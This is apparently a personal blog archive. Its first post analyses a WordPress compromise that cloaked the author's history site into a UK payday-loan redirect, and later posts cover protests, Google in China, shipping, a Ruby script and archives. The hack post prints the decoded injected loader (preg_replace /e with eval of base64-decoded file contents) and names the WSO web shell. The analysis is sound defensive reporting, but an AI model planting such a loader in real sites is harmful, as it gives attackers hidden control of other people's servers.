A Tale of East Asian History, British Loan Sharks, and a Russian Hacker

A few weeks back I woke up at 6:30 in the morning to a phone call.

“I would like to buy your domain froginawell.net. $500, what do you say?”

I instinctively tried to answer in a voice that did not reveal the fact I had just been jolted out of deep sleep. There may have been a few introductory sentences preceding this very forward proposition but I wasn’t fully conscious yet.

Frog in a Well is a site I created back in 2004 to host a few academic weblogs about East Asian history authored by professors and graduate students. I haven’t been posting much there while I finish the PhD dissertation, but some of my wonderful collaborators have been keeping it active. Since we have a good stock of postings on a wide range of topics in East Asian history, the site attracts a fair amount of traffic, especially from those searching Google for “ancient Chinese sex” or, apparently, “Manchu foot binding.” I think these visitors find the resulting links insufficiently titillating for their needs. Our site has been ad free, however, and I fully intend to keep it that way.

I turned the gentleman down and went back to sleep. When I reached the office, I saw an email from the man, let’s call him Simon. He made the same direct offer, which came in a few minutes before he called. I replied to his email and explained I had no wish to sell the domain.

A week later Simon emailed again. This time he wanted to rent my domain.

Looks like someone’s tried to hack you unless you have changed your home page title?? Anyway your ranking has increased for my key phrase and I really want to rent that home page. I will increase my offer to $150 PER DAY.

$150 per day? Key phrase? What key phrase did Frog in a Well offer him? His email address suggested he worked at a solar energy company in the UK. The site looked legitimate, offering to set up solar power for homes for a “reasonable price.” I searched in vain for any clue as to why he would want the domain froginawell.net. I did a search on our site for anything to do with solar power or energy. Nothing stood out. I didn’t want to ask him, since I didn’t want to get his hopes up.

As for the hacking, this had happened before. Sometimes I have been a little slow in getting our WordPress installations upgraded and twice before our blogs have been hit with something called a “pharma hack.” This insidious hack leaves your website looking just like it did before but changes its contents when Google searches your site, changing all blog posting titles into advertisements for every kind of online drug ordering site you can imagine. It is notoriously difficult to track down as the hackers are getting better and better at hiding their code in the deep folder hierarchies of WordPress or in un-inspected corners of your database.

This time, however, it looked like there was no pharma hack. Instead, my home page for froginawell.net had been changed from a simple html file into a php file, allowing it to execute code. The top of the file had a new line added to it with a single command with a bunch of gibberish. At the time, I had no time to look at it in depth. I was trying to wrap up the penultimate chapter of my dissertation. I removed the offending text, transformed my home page back into html, changed the password on my account, reinstalled the China blog from scratch (which had been hacked before), and sent an email to my host asking for help in dealing with a security breach. My host replied that they would be delighted to help if I paid them almost double what I was currently paying them by adding a new security service. Otherwise, I was on my own.

After my rather incomplete clean up based on where I thought the hacked files were, I replied to Simon, “The offer is very generous, but I’ll pass. I’ve decided to keep our project ad-free.”

Simon wrote back again the same day. He was still seeing the title of my hacked page on Google. I couldn’t see what he was talking about when I searched for Frog in a Well on Google, but assumed he was looking at some old post that had been cached by Google back when it was in its hacked form. Simon wrote:

Do you realize why people are suddenly trying to hack you? Because of the earning potential your site currently has.

I would appreciate if it you would name your price because everyone has one and I don’t want either of us to miss this opportunity. I can go a somewhat higher on the daily fee if it would strike a deal between us. How about $250 per day. If money is no object then donate the $250 a day to charity.

$250 a day? This was downright loopy and getting more suspicious all the time. I was traveling over Memorial Day weekend at the time. If the offer was real, and I was willing to turn the Frog in a Well homepage into someone’s ad, it still would have been a pain for me deal with, and it all was too fishy. I turned him down and told him I thought the matter was closed, I wouldn’t accept ads on Frog in a Well for any price.

Simon wrote back one last time.

As a businessman I always struggle with the concept of no available at any price when it comes to a business asset. However, I respect your decision and will leave you with this final message. I will make one final bid then will be out of your hair if you decide you do not want it. $500 per day payable in advance. Practically $200,000 a year.

He was clearly perplexed at my refusal to behave like a rational economic actor. I completely understand his frustration. Perhaps he hasn’t met many crunchy socialist grad student types. I wrote him back a one-liner again turning down his offer but wishing him luck with his business, which, at this point, I still assumed was a solar power company.

When I got home, I determined to resolve two mysteries: 1) what was Simon seeing when he found Frog in a Well on Google in its hacked state? 2) Why on earth would Simon want to go from $500 total to buy my domain to $500 a day to rent it?

The first thing I discovered was that my site was still compromised. The hackers had once again modified my home page, turned it into a .php file and added a command at the top that contained lots of gibberish. Their backdoor did not reside, as I had assumed, in the oldish installation of the China blog I had replaced but somewhere else. I would have to have a go at reverse engineering the hack.

Anatomy of a Hack

The command that the hackers added to the top of my home page was “preg_replace” which in PHP simply searches some text for a term, and replaces it with some other text.

preg_replace("[what you are searching for]","[what you wish to replace it with]","[the text to search]")

In this case, all of this was obscured to me with a bunch of gibberish like “\x65\166\x61\154”. This text is actually just an alternating mix of ASCII codes in two different formats, decimal and hexadecimal. PHP knows not to treat them like regular numbers because of the escape “\” character, followed by x for the hexadecimal numbers. You can find their meanings on this chart. For example, the text above begins with \x65, which is the hexadecimal for “e” and then the decimal for “v” and back to hexadecimal for “a” and then finally decimal for “l,” all together “eval”

This makes it extremely difficult for a human such as myself to see what is going on, but perfectly legible to the computer. I had to restore all the gibberish to regular characters. I did this with python. On my Mac, I just opened up the terminal, typed python, and then printed out the gibberish ASCII blocks with the python print command:

print("[put your gibberish here]")

This yielded a command that said:

Look for: |(.*)|ei
Replace it with: eval('$kgv=89483;'.base64_decode(implode("\n",file(base64_decode("\1")))));$kgv=89483;
In the text: L2hvbWUvZnJvZ2kyL3B1YmxpY19odG1sL2tvcmVhL3dwLWluY2x1ZGVzL2pzL2Nyb3AvbG9nLy4lODI4RSUwMDEzJUI4RjMlQkMxQiVCMjJCJTRGNTc=

Now I was getting somewhere. But what is all this new flavor of gibberish at the end? This text is encoded using the Base64 encoding method. If you have a file (only) with Base64 encoded text you can decode it on the Mac OS X or Linux command line with:

base64 -i encoded-text.txt -o outputed-decoded.txt

You can also decode base64 in Python, PHP, Ruby, etc. or use an online web-based decoder. Decoded, this yielded the location of the files that contained more code for it to run:


It wasn’t alone. There were a dozen files in there, including text for an alternate homepage. The code in my home page, with a single command up front, was running other commands hidden in a folder deep in the installation of my Korea blog. Even these filenames and their contents were encoded with a variety of methods including base64, md5 encryption, characters turned into numbers and iterated by arbitrary values, and various contents stored in the JSON format. I didn’t bother working out all of its details but it appears to serve a different home page only to Google and only under certain circumstances.

One of the hacked files produced a version of the British payday loan scam speedypaydayloan.co.uk, which connects back to a fake London company “D and D Marketing” which can be found discussed various places online for its scams. In other words, for Britain-based, and only Britain-based visitors to Google who were looking for “payday loans,” a craftily hacked homepage at Frog in a Well was apparently delivering them to a scam site or redirecting to any one of a number of other sites found in a large encoded list on my site.

I soon discovered that these files were not the only suspicious in the Korea blog installation, however. These were just the files which produced the specific result desired by the hacker. After a lot more decoding of obscured code, I was able to find the delivery system itself. To deploy this particular combination of redirection and cloaking of that redirection, the attacker was using a hacker’s dream suite: something called “WSO 2.5.” Once they found a weakness in an older version of wordpress on my domain, they were able to install the WSO suite in a hidden location separate from the above hack. Though I don’t know how long this Youtube video (without sound) will remain live, you can see what the view of the hacker using WSO looks like here. The actual PHP code for a plain un-obscured installation of the backdoor suite that was controlling my server can be found (for now) on pastebin here.

Click to enlarge the image

Simon and Friends

So how does this connect back to our friend Simon and his solar power company? Google webmaster tools revealed that the top search term for Frog in a Well was currently “payday loans” and it had shot up in the rankings some time in early May when the hack happened, with hundreds of thousands of impressions. Something was driving the rankings of the hacked site way up.

Simon had written in one of his emails that he had “many fingers in many pies” which suggested that he was working with more than just a solar power company. After figuring out what my hacked site looked like, I searched for his full name and “loans uk” and soon found that he (and often his address) was listed as the registrant for a whole series of domains, at least one of which had been suspended. These included a payday loan site, a mobile phone deal website, a home loan broker, a some other kind of financial institution that no longer seems to be around, and another company dedicated to alternative energy sources. My best guess is that Simon’s key phrase was none other than “payday loans” and he saw a way to make a quick buck by getting one of his financial scams advertised through the newly compromised Frog in a Well domain. Was he really serious about paying that kind of amount? What had been his plan for how this was going to pan out? Did he know that the Google ranking was probably a temporary result of a deeply hacked site?

Simon’s offer of $500 was not the last. I removed all the hacker’s files, installed additional security, changed passwords, and began monitoring the raw access files of my server. I requested a review of my website by Google through the webmaster tools that hopefully will get me out of the payday loan business in the UK. However, the offers continued to come in.

Luke, one of Simon’s competitors (again, I’m changing all names), wrote me a polite email with a more forthcoming offer that confirmed what I had found by poking through the files:

You may not be aware but your site has been hacked by a Russian internet marketing affiliate attempting to generate money in the UK from the search term “payday loans”…As a rough indicator this link is worth around $10,000 a week to the hacker in its current location. We are a large UK based competitor of this hacker and whilst we don’t particularly his activity, we’d like to stop him benefiting from this by offering to replace this hyperlink on your site which he has inserted and pay you the commissions weekly…

It was “clever stuff,” he explained, “but very illegal.” I turned him down politely.

Click to enlarge the image

No sooner had I cleaned up my server, it began to come under DOS attack (denial of service). The three blogs at Frog in a Well were hit by about a dozen zombie bots from around the world who tried to load the home page of each blog over 48,000 times in the span of 10 minutes. My host immediately suspended my account for the undue stress I was causing to their server. They suggested buying a dedicated server for about 10 times the price of my current hosting. I had moved to the current host only a year earlier when our blogs came under DOS attack, mostly from China, and the earlier host politely refused to do anything about it. My current host was kind enough to reinstate the site after a day of monitoring the situation but there is nothing to prevent an attacker from hiring a few minutes of a few bots to take down the site again. It is a horrible feeling of helplessness that can really only be countered with a lot of money – money I was not about to attempt to make by entering the payday loan business. To add a show to the circus, within hours of being suspended two separate security companies contacted me, promising protection against DOS attack and asked if I wanted to discuss signing up for their expensive services. How did they know I had been attacked by DOS in the first place and not suspended for some other reason?

A few days later, yet another payday loan operator, let us call him Grant, had contacted me through twitter. He explained that the “Russian guy” who he believed had hacked me was likely “untouchable for his crimes” thanks to his location but again suggested that we “take advantage of this situation” and split the proceeds of linking my site to him 50/50.

I will pay you daily, depending on how much it makes either by Paypal or bank transfer. As an indication of potential profits, when I have held 1st place I have been regularly making £15,000 per day. I can see your site bouncing around the rankings so I am unsure how much it would make… I suspect it would be comfortably into 4 figures a day but without trying I can’t say for sure.

I turned him down and explained that I had cleaned out the hack. It would take some time before this would be reflected on Google. However, in response to my request for more information about what he knew about the hack, Grant kindly sent me a long list of other sites that been hacked by my attacker but whose only role in this game was to backlink to Frog in a Well with the link text “payday loans” so that Google would radically increase my ranking. Luke had suggested that this approach was only effective because Frog in a Well was already a relatively “trusted” site by Google. Grant (emailing me directly from the beach, he said, which I guess is a good place for someone pulling in thousands of pounds per day on this sort of thing) also supplied me with half a dozen other sites that were now being subjected to the very same cloak and redirect attack. He speculated that I had come under DOS attack from one of his other competitors who, instead of attempting to buy my cooperation, had spent the negligible cost required to simply knock me off the internet.

Hopefully my ordeal will be over soon, and I need merely keep a closer eye on my servers. For Grant, Luke, and Simon, however, their Russian nemesis continues his work. A last note from Grant reported,

There is an American radio station ranking for payday loans on google uk now, so that’s yet more work for me to try and undo lol.

Update: My thanks to 陈三 for translating this post into Chinese.

Notes from A Solidarity March with Occupy Boston

On Monday I joined in the Student Solidarity March for Occupy Boston together with a few friends and I thought I would share a few notes.

I don’t have much experience with protesting. Though I consider myself active politically, I have joined less than half a dozen large protest rallies and marches, and almost all of them were related to the issue of immigration. It was a fascinating experience, differing in many ways from other protests I had joined before but again, due to my small sample size, it is very possible that some of the elements described below are, in fact, common features and my observations reveal the ignorance of a tourist.

Harvard University Occupies Boston

The first scene was at Harvard. Before converging on the Boston Commons where the main march was to begin, students from around the city gathered at their own university. Harvard and MIT students were, at least according to posters and emails before the gathering, to assemble together and occupy the subway (since we were apparently too lazy to walk the hour or so downtown). The initial assembly point was at the wonderfully neutral location of the John Harvard statue inside the Harvard campus (meeting at MIT would have put us much closer to the main march). I showed up wearing a Columbia shirt to break the Crimson tide, thus, of course, completely sparing me any elitist stain. Instead of hiking up deep into our territory, our MIT friends made it downtown in a few separate groups, presumably in flying cars, teleportation devices, or astride their communally shared fleet of robot dogs.

Harvard University Occupies BostonThe poster for the event advertising “Harvard University Occupies Boston” was the first reminder of the somewhat awkward positionality of our merry band. Of course Harvard University already, in a very real sense, Occupies Boston through the power the university itself wields, what it represents, but most directly through the many graduates of the university who heavily populate the ranks of the financial, consulting, and law firms throughout the city. This awkwardness would continue to be manifested whenever the slogan “We are the 99%” was yelled. We debated among ourselves the intricacies of how that phrase might be construed to include or exclude us. Should we write self-criticisms, joked one, but the idea may well have received a warm reception if put to the crowd.

Hallelujah and The People’s Mic

Somewhere between 50 and 5000 people showed up at John Harvard statue, but as you know, counting attendance at protests is an inexact science. Before we boarded the subway downtown, there were posters to be made, and an opportunity for discussion.

The Occupy Boston and Occupy Wall Street movements are extremely decentralized, with diverse groups and diverse goals represented. It is thus easy to mock and hard to categorize. It is becoming harder, however, to ignore it and I joined in order to express my support but also try to better understand it. If the political goals are still varied, there seems to be, at least, a set of common practices emerging. Let me list a few of them:

Many Groups, One Shopping List – Despite the diversity, they seem to be incredibly organized online, where you can find news, a press kit, a garbage collection schedule, general assembly videos, and even a unified shopping list.

The People’s Mic – Though our pre-march discussion was too short to see it fully in action, direct democracy assemblies are designed to allow anyone to speak. In order to make sure that everyone can hear the speaker, everything spoken was repeated by the crowd; phrase by phrase. I’m told this comes from the Occupy Wall Street protests, where a ban on voice amplifying devices made the innovation necessary. To speak before the group you add your name to a “stack” (waiting list) which one of the facilitators manages. When it is your turn you yell, “Mic Check!” and the crowd responds with “Mic Check!” After that, every phrase you utter will be repeated by the crowd, though I noted that when more extreme or controversial things were said, the mass echo was notably less enthusiastic. It is a fascinating technique, which surely makes long political meetings slightly more than twice as long, but for this very reason it encourages brevity and clarity in a speaker. The effect can be an intoxicating experience, but also very empowering. The nagging Orwellian feel of the robotic repetition is well mitigated by the fact that you are not repeating the words of “The Leader,” but of everyone who speaks. Rachel Maddow describes the practice and shows examples:
People’s Mic! Today’s Best New Thing in the World

Gesturing the Revolution – The first task carried out by the “facilitators” at the Harvard Statue (who nominated these people to be our facilitators and what organizations they came from was not, as far as I can remember, ever revealed) was to give us a basic education in crowd communication. After explaining the People’s Mic they introduced us to a system of hand signals I have never seen before but which has been commented upon in various media reports. Our lesson included the following instructions:

1. If you agree with what a speaker is saying raise your hands and wiggle your fingers. If you had not been told this was its purpose, you might suspect the person was offering a “Hallelujah!”
2. If you are more ambivalent about what a speaker is saying, you wiggle your fingers in front of your chest
3. If you disagree with the speaker, you hold your hands in front of your chest and flop them down in a motion that to me looked looked like a begging dog
4. If you wish to ask a clarifying question you hold up your hand and make the letter “C”
5. If you wish to make a “process point” which I guess is a kind of point of order, you make another hand signal that I believe resembles a triangle or perhaps a “T”.
6. If you find what the speaker is saying offensive, you cross your arms over your head, creating a large “X”

At this point an apparently experienced protestor in the audience asked why they did not use a common gesture to indicate that you wanted to make a direct counter-point. One of the leaders—I’m sorry—facilitators, made the reasonable point that this was because that gesture makes it impossible to have smooth discussions without them devolving into rowdy debates. Instead people who disagreed were to add their name to the “stack” and speak in turn.

Now trained in the semiotic arts of the revolution, we began a discussion and a few people on the “stack” spoke, but besides a few Hallelujahs, we didn’t get to deploy the full range of acquired vocabulary before leaving for downtown.

Does anyone know more about the origins of this system? In addition to serving as a system of immediate speaker feedback this appears to be the primary system used for consensus formation at protest general assemblies; a non-binary process known as a “temperature check.” I have seen mention of it in reference to the recent student protests in London. This Guardian article includes a great gesture for “I’m bored” which I must remember to deploy at appropriate moments in academic lectures. I see gestures like those we learned described in Consensus: A New Handbook for Grassroots Social, Political, and Environmental Groups but that work argues strongly against having any gestures of a negative kind in order to reduce speaker anxiety and create a more welcoming environment.

Lawyer Tags – Several people moved through our group of protesters distributing little tags for us to tie to our arms. On one side was information about our protest, the protest facebook page, Google group, and a contact email. On the other side was the telephone number for the National Lawyers Guild, an important but nothing if not radical legal organization that supports protesters in their encounters with law enforcement. In the event of an arrest, all of our belongings may be confiscated or discarded so this little tag was a nice little reference card. We were also encouraged to copy the phone number onto our arm since the tag might be easily lost. Lawyer Tags

I should note that both while we were being told about the tags and later on the Boston Commons, there was a repeated and strong emphasis on showing respect for law enforcement, non-violence, and following the law (except, I guess, those we break). Which brings me to another fascinating innovation that I have only seen glimpses of in the news before:

Legal Observers – When we got to the assembly point on the Boston Commons there were bands playing, the usual anarchists occupying the central gazebo (demonstrating once again the principle that the early herd gets the gazebo), and a wide array of people around the edges. As each new university group arrived (Tufts and U Mass had particularly strong showings, with the latter taking full advantage in their slogans of the fact the word “mass” is in their name) everyone cheered their arrival. Before the full march began, however, more facilitators (again, I have no idea who they were or what organizations they represented) gave us more training through the People’s Mic. They pointed to a number of neon hat and vest clad individuals hovering around the edges of our mass, just in front of a row of police officers observing us. These were to be our “legal observers” tasked with the job of being neutral observers of the protest. They would monitor the behavior of the protesters, and especially observe any clashes or interactions between the protest and law enforcement. Since I believe at least some of them were from the National Lawyer’s Guild, I have some doubts about their neutrality, but overall, I must say, I was quite impressed by their number, and I think their presence throughout the march on the sidelines was a great comfort, even if no one expected a clash with the police.

Protest as Socializing Process

My overall experience on Monday was very positive. The energy, most of it positive, and the diversity of the people involved left a strong impression on me. The slogans were often too pointlessly populist, dry or cliche, and clearly many of us were just a bit confused about what the whole experience added up to. We marched down to the occupied Dewey Park and circled around it. Later that night, some students and others who decided to join the “occupation” were arrested by the police and I’ll await more accounts of what transpired before commenting on it. I do hope the occupation continues, even if it does not graduate beyond the realm of political experiment, and that it evolves and develops politically.

There are a whole slew of ways this movement is being described and justified by its sympathizers and participants alike. I have not yet formed a strong opinion on how best to conceptualize it, but I feel that at least on two levels there is something important happening. From the outside, as long as the “occupy” movement continues and grows without becoming violent, it has a place at the table of political discussion. Its destabilizing effect can play a very important part in a stalled political process. Even if its internal unity remains dependent upon its ambiguity, it is like the tormented Poe’s Raven which, “never flitting, still is sitting, still is sitting / On the pallid bust of Pallas just above my chamber door.”

From the inside, even from the limited contact I had with the movement on Monday, participation in a movement like this, and many like it, is a socializing process, especially when it is full of innovative approaches: socializing participants but also teaching them a set of valuable political practices that can, in turn, be deployed again and again with greater focus in a whole range of circumstances. Monday was a holiday, but I very much felt like class was in session.

Google and the Pragmatic Idealist Response

Google has made an unprecedented threat to end the censorship of its search results in China and, if this is unacceptable to the Chinese government, even contemplate leaving the Chinese market. The announcement has been combined with the admission that there has been a massive coordinated attack on Google’s security and the potential targeting of private records of human rights activists.

It remains to be seen what Google will actually do in the near future. I am inspired to post something about this unusual moment in order to make two comments. First, I wish to respond to a kind of cynical reaction to Google’s announcement that I find frustrating. Second, I wish to argue that this is an opportunity for anyone who wants to see a China which one day permits the open, free, and competitive exchange of ideas. As such we need to think about how to amplify its potential impact.

The Google announcement has deservedly generated a huge response, even though it coincides roughly with the terrible news of the destruction in Haiti. The reactions are many, and I’m particularly interested in the variety of responses among Chinese which so far seem to range from complete shock, quiet or vocal support for Google, or a misguided anti-imperialist attitude of “good riddance.”

One of the responses I find incredibly unproductive. Two representative examples can be seen in this Techcrunch article and a posting by Evgeny Morozov at Foreign Policy. Their message is essentially a cynical one: It is foolish for us to pour praise on Google for what deceptively seems like a just moral stance – the corporation is merely acting out of pure calculated greed.

This is, in my opinion, a complete waste of words, an unnecessary attempt to dampen enthusiasm about what is potentially, but by no means guaranteed to be, a historic moment. No one should be surprised to discover that corporations act in the interest of their profits and shareholder benefits. No one should be surprised to learn that Google is doing a cost-benefit calculation with relation to its future in the Chinese market and we still don’t know what its final fate in China will be. These things should merely be accepted as the, “bloody obvious.”

Which brings me to my second point: what are we going to do about? What potential impact, if any, can this have on a cause many of us care about?

Pragmatic Idealism

I couldn’t give a shit about the profits of Google, or what its real motivations are. I do care, however, what the reactions of the Chinese people are to this and what marginal influence this move can have on efforts within China to change the information environment in the near and the long term.

From that perspective, it is not obvious that Google dropping censorship and withdrawing from the Chinese market is in the best interests of freedom of information in China, even if it were followed by all other foreign companies. If the internet environment in China is dominated completely by Chinese companies who are perfectly willing to censor all of its content, this may result in a worse situation than one in which foreign search engines and some international social and media websites have limited, if censored, presence in China, with even a small percentage of the market share there. Coming from someone who studies traitors and treason, this seems to me to be the classic collaborator’s dilemma: will collaboration limit the damage? Will resistance result in a worse outcome?

The answer is not always that resistance is better – sometimes collaboration is better. Sometimes negotiating with evil produces more good. Sometimes subversion hidden behind compliance is the path to take. These things should be carefully evaluated according to circumstances. Clearly, however, in some cases resistance is the better choice and can move things perceivably towards a desired end.

The answer is not obvious, but I think in this case, if Google were to take a stand, it would matter: despite its low market share, Google has made a splash on the Chinese market, and young Chinese engineers and educated people all over the country recognize and respect the company – many of them dream sincerely of one day working at the corporation. Even some Chinese friends who use the competitor Baidu are disgusted with its corrupt history of manipulation of hits to promote advertising revenues, its occasionally substandard results (sometimes even with Chinese search terms!) and lack of innovation.

Having made its mark, having a well known brand, and then suddenly withdrawing in a blaze of glory—and while withdrawing for a short time removing censorship from its search results: at the very least this will likely produce a memorable reaction: some in China will feel shame, and others will embrace a defiance. Those who are defiant will be forced into the ridiculous position of claiming, “Ha! Be gone stupid imperialistic western company – if you refuse to hide things from us like our dictatorship tells you to, then you are just selfishly giving into those superior companies who are willing to be more submissive to our glorious Party and ever more powerful, if castrated, Nation.” Those who feel shame, will be reminded, yet again, of the contrast between what they are permitted to see, what they may see when they climb over the great firewall, and what most of the rest of the wired world can see, with a few notable exceptions.

However, this isn’t and shouldn’t be up to Google. It is up to us to make it matter: not by hailing Google for its courage, or setting up fan clubs for Google co-founder Sergey Brin. We should ask ourselves how we can maximize the impact of the decision, if Google follows through with it, to say no to collaboration with Chinese censors, then let us see if we can amplify the impact of that decision. There is now a brief moment of opportunity, a time when we can make something like this matter. Instead of cynically deriding Google for merely acting in its own interests, we should be debating how we might best amplify the impact of such a decision while minimizing the similar amplification of a Chinese nationalistic backlash that will inevitably accompany it. The goal is simple: to make the contradictions so obvious to many within China just that much clearer, to make the hypocrisies pointed out by activists within China that much easier to identify, and to increase the discomfort felt by Chinese government as well as institutions both foreign and domestic. It may result in only one of a “thousand cuts” in the farce that is Chinese media and internet policies, but that is how change is accomplished.

Damage Report: China Box Disaster 2009

I have been doing research in Asia for two years and during this time I have sent back about twenty boxes to the US. Most of these have contained books and a few, especially from Korea, contained important documents that I photocopied in the archives.

Before sending them, I take pictures of their contents, make a little inventory, and in the case of documents, create an index with each document numbered.

I am very happy about the fact that since 2004, none of the many boxes I have sent back from Japan, Korea, or Taiwan have been missing, or their contents suffered more than the occasional dented book spine.

This year, however, I had a bit of a disaster. I sent two boxes back from Jinan, China. I sent them in official China Post boxes to New York state via sea.

Altogether my boxes contained about 60 books, with padding of a blanket and a few sweaters. Many of the books make up a series on Shandong during Sino-Japanese and civil wars. Perhaps half of them were out of print used books I had spent several days hunting down in various used book sellers in Jinan.

Neither of the original boxes arrived. Instead two new, smaller and very much lighter boxes arrived, containing a collection of about 20 mangled and, in some cases, ripped books. It was stamped “Arrived damaged, New Jersey”

I guess I should be grateful that about 20/60 of my books arrived. I’m also very glad that I hand carried the 20 or so volumes of published but long out of print and restricted distribution (內部) historical documents most important for my dissertation.

While the US postal system is hardly worthy of praise, I have never had more than bruised corners on the many other boxes I have sent back from Asia. Thus, a warning to those of you studying in China: hand carry out the most important stuff.

Wenlin Conversion Script

Wenlin is the the best piece of software around for students of Chinese. Among other tools, it has a powerful and handy offline dictionary with very flexible and fast search options as well.

I know many students of Chinese that use Wenlin to get their definitions and input vocabulary into flashcard software. Most recently I saw someone do this in a coffee shop here in Taipei, and it brought back a lot of memories of me doing the same in Beijing almost a decade ago.

Wenlin doesn’t make it easy for you, however, to get the word entries into a format that can be easily imported into flaschard applications. There is no “export” feature, presumably because the developer doesn’t like the idea of large parts of the Wenlin dictionary getting out of the software and into a separate database. However, the lack of such a feature means that students have to copy and paste words from Wenlin and add their own tabs. In my case, I also like to delete the alternate hanzi to keep my flashcards more clean.

Although a more experience programmer with good regular expressions skills could easily take this further, I am releasing the results of an evening spent trying to learn how to program in the programming language Ruby:

Wenlin Conversion Script 1.3

Here is a screencast explaining how to use the script:

Wenlin Conversion Script Screencast

This script takes a text file with a list of Wenlin dictionary entries (Saved in TextEdit, not in Wenlin) and puts tabs between the hanzi and the pinyin and between the pinyin and the definition. It saves the converted file which can then be easily imported into your favorite flashcard program.

It is made up of two scripts: the convert.app applescript application which you is what you use to run the script and the convert.rb ruby script which does the actual conversion. You can customize three options in the convert.rb script. Just open it up and set the three option variables at the top to true or false according to your preference for that option. There is a description of what each option does in the ruby file but basically they control whether the alternate traditional/simplified hanzi are removed, whether the “|” character is changed to “Example: ” and the “~” in examples replaced by the pinyin of the word.

I haven’t tested this too extensively so if you see it do strange things with the wenlin vocab items let me know and I’ll tweak the script in the future.


-I just noticed in the screencast that it split the word “fandong fenzi” and put “fenzi” into the definition – I need to update the regular expression so that it looks for the part of speech rather than a space to separate the pinyin from the definition. I didn’t realize that Wenlin sometimes puts spaces into its pinyin words. I’ll release this soon.

-I just updated a 1.1 version. See the enclosed Read Me file for things I have fixed and changed in this new version of the script.

-I just updated the script again to 1.3, see the readme in the download for the details.

Copyright Claims on US Government Documents

In the past I have repeatedly complained about claims of copyright protection where no such protection exists.

I have talked about this problem on Google Books, where books are not given full view when they are fully in the public domain or where public domain books republished by Kessinger Publishing are used which wrongly claim copyright protection. A recent critique of Google Books by a blogger at the AHA has mentioned a similar problem in a posting here.

I have also expressed my frustration with the new Footnote.com service which gives access to completely public domain documents through a paid service and then forbids the viewers to copy and freely use this completely unprotected and public domain content through their restrictive licensing agreement. This is part of the trend towards using licenses to restrict the usage of materials which cannot otherwise be defended by copyright.

Isn’t it enough that we have to face an unjustifiably long lasting copyright protection laws, and various other blocks to the increasing potential for cultural innovation and information sharing provided by the internet?

Well, this problem isn’t limited to the online world. I have been looking at a lot of microfilms lately of US government documents, mostly from the US State Department. These are documents I can usually see the originals of by visiting the National Archives. Almost all of these documents, that is, any documents produced by the US Government, are completely in the public domain and no publisher or individual can “legally assert copyright unless the publisher or individual has added original, copyright protected material.”

So explain to me why it is that University Publications of America, which created the microfilms of these US government archival records, can get away with proclaiming their copyright on the microfilm reel (Click picture to view larger version):


Even if they could claim copyright on messages they put at the beginning of the microfilm, which is hardly what I think the law has in mind when it says “original material,” then they copyright does not extend to the materials held within. I don’t think that reproductions of these public domain documents in this photographic form, is in anyway original. Furthermore, when there are copyrighted materials (there are scanned published books in the possession of the state department, for example), UPA can hardly claim copyright over such materials, even if I’m grateful that they include such scans in the microfilm, possibly in violation of the copyrights on those materials.

Look at this warning they put in:


Even if we let them have their copyright on this page of the reel, I don’t understand how UPA has any right to graciously “grant” me permission to make enlarged photocopies of only selected items, or deny me the right to make a reel duplication of almost the entire reel, except their introductory frames. Where do they get this right over the material? If these are public domain materials, I should be able to duplicate and use these materials in any way I see fit, whether it is selected photocopies, or print outs, or by copying every single unprotected page within the reel. I should have this right whether I’m engaged in research, or even if I wished to publish a book (without asserting copyright) with the entire public domain contents shown.

These kind of false claims help contribute to the “permission culture” that we find ourselves in, where we become increasingly paranoid about exchanging ideas and creating new culture that uses the rich variety of materials that we have access to.

First Visit to the National Archives

I just spent two days at the US National Archives at College Park, MD. It is a truly wonderful place to work as a researcher. Sunlight streams through the windows in the wide open reading room on the second floor where researchers sit at well spaced workstations with their happily plugged in laptops and work a box at a time from a trolley full of boxes delivered to them during the several archive “pull times” throughout the day. One corner of the second floor is filled with copy machines and a long “research assistance” room behind the workspace area is staffed by often elderly looking archivists who command the range of obscure knowledge required to guide you in requesting the materials most likely to be useful for your research.

To get to the National Archives complex (Archives II) I simply hopped on the Green Line of the Metro and took it to Greenbelt, where I took the R3 bus that goes into the archive campus and will drop you off near the entrance (you can probably get off at one of the earlier Metro stops and take the bus from there as R3 passes several Green Line stops).

There are a few rules and procedures a researcher has to go through to get to their materials but on the whole I found the whole process very smooth and everyone respectful and helpful along the way. When you enter the building you have to put your luggage through an X-Ray machine and go through a regular airport check-in-like screening. If it is your first visit, you then turn right and enter the orientation room where they make you view a computer slide presentation summarizing the important rules and fill out an on-screen form to register yourself as a researcher. After this you are issued a photo ID “researcher card” on the spot which is valid for one year. There are lockers in the basement to store most your possessions. All I brought in with me was my laptop, power cable, headphones, and a few stapled sheets of paper with some notes listing what archival documents I wanted to look at. No bags or pens are allowed inside (they provide pencils, note cards, and paper once you get in), papers brought in have to be approved/stamped, and laptops, scanners, and other equipment need to be registered. When you exit the protected area you have to check the serial number of your equipment against the registration receipt, open laptops to show that no documents are hidden within, and any photocopies you make while on the inside have “Secret” or “Confidential” etc. blacked out if this is written on them, get stamped “Declassified” and identified as copies.

Whenever you enter and leave the protected area they swipe your card. Whenever you enter a room to work in, they swipe your card, and check your materials when you leave. I never felt this process to be that annoying however, and the archivists were incredibly friendly everywhere I went. I left my belongings and microfilms at my workstation whenever I went downstairs and outside the protected area to visit their nice cafe or the convenience store for a snack.

I was impressed by the huge variety of people doing research here.
Continue reading First Visit to the National Archives

Norwegian Schools and Views on Education

I’m waiting for my flight to Stavanger here in the beautiful and extremely expensive Oslo airport (Bottle of water: $3.17, Strawberry Yoghurt $2.70, Small Cheese and Ham Roll $7.77, etc.) and reading today’s Dagbladet (I think it is usually considered a somewhat leftist Labor party supporting and populist paper). In a series of articles entitled “Norwegian Schools in Crisis” there was one piece listing the results so far from a series of studies on Norwegian education and comparisons with several other European countries and the US. Below are a few of the conclusions so far according to two professors Anne Welle-Strand and Arild Tjeldvoll:

Too many bad teachers Apparently there a lot of under-qualified and not sufficiently trained teachers in Norway, including some recruited straight out of secondary school (C: can this be true? Am I not understanding this correctly: “I flere år er det blitt rekruttert svake kandidater fra videregående skole.”)

Not enough specialization While teachers in other countries focus on one topic or one grade level, Norwegian teachers often follow their class from one year to the next. This has resulted in many Norwegian primary school teachers lacking in specialized knowledge. C: I remember this when I spend a brief time in Norwegian elementary school (Sunde Skole). I have often wondered what the pros and cons of this system must be.

Strong opposition to evaluations and student testing The researches sees this as the biggest problem with trying to raise quality. C: I agree to a point that this can be a problem but I would want to guard against the opposite problem which arises in places which go way too far in trying to quantify progress and knowledge with elaborate testing and evaluation schemes.

An ‘Anti-Knowledge View” («anti-kunnskaps-syn») These researchers claim that over-emphasis on the socialization aspects of education has gotten in the way of knowledge and hurt Norwegian’s ability to compete internationally.

